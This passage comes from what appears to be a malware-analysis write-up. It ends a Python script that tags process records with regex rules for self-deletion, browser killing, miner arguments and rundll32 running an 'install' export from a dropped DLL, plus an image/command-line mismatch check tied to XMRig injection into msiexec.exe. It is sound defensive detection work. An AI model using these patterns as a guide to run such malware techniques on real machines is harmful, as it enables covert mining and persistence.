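    re.I)
# rundll32 invoking an export named "install" from a dropped DLL.
RUNDLL_INSTALL = re.compile(r"rundll32(\.exe)?\"?\s+\"?[^\"]+\.dll\"?,install", re.I)


def image_cmdline_mismatch(p: Proc) -> bool:
    """True when the command line never names the image it supposedly runs.

    A normally started process has argv[0] naming its executable. A miner
    argument vector under an msiexec.exe image (PIDs 184 and 5124 above)
    means the image was started and then replaced or injected into, which is
    what the XMRig memory-dump hits on PID 5124 indicate.
    """
    stem = p.image.rsplit("\\", 1)[-1].rsplit(".", 1)[0].lower()
    return stem not in p.cmdline.lower()


def classify(p: Proc) -> list[str]:
    """Return the rule names that fire for one process (order is fixed)."""
    tags = []
    if SELF_DELETE.search(p.cmdline):
        tags.append("self-delete")
    if BROWSER_KILL.search(p.cmdline):
        tags.append("browser-kill")
    if MINER_ARGS.search(p.cmdline):
        tags.append("miner-args")
    if RUNDLL_INSTALL.search(p.cmdline):
        tags.append("rundll32-install-export")
    if image_cmdline_mismatch(p):
        tags.append("image/cmdline-mismatch")
    return tags


def scan(procs: list[Proc] = PROCESSES) -> dict[int, list[str]]:
    """Map PID -> tags for every process that triggers at least one rule."""
    return {p.pid: tags for p in procs if (tags := classify(p))}


if __name__ == "__main__":
    for pid, tags in scan().items():
        print(f"{pid:>5}  {', '.join(tags)}")
```

The mismatch check is the one worth carrying into real telemetry (Sysmon event 1 or EDR process-start records carry both fields): it does not depend on knowing any pool name, and it is quiet on PID 5472, whose command line correctly starts with the MsiExec.exe path.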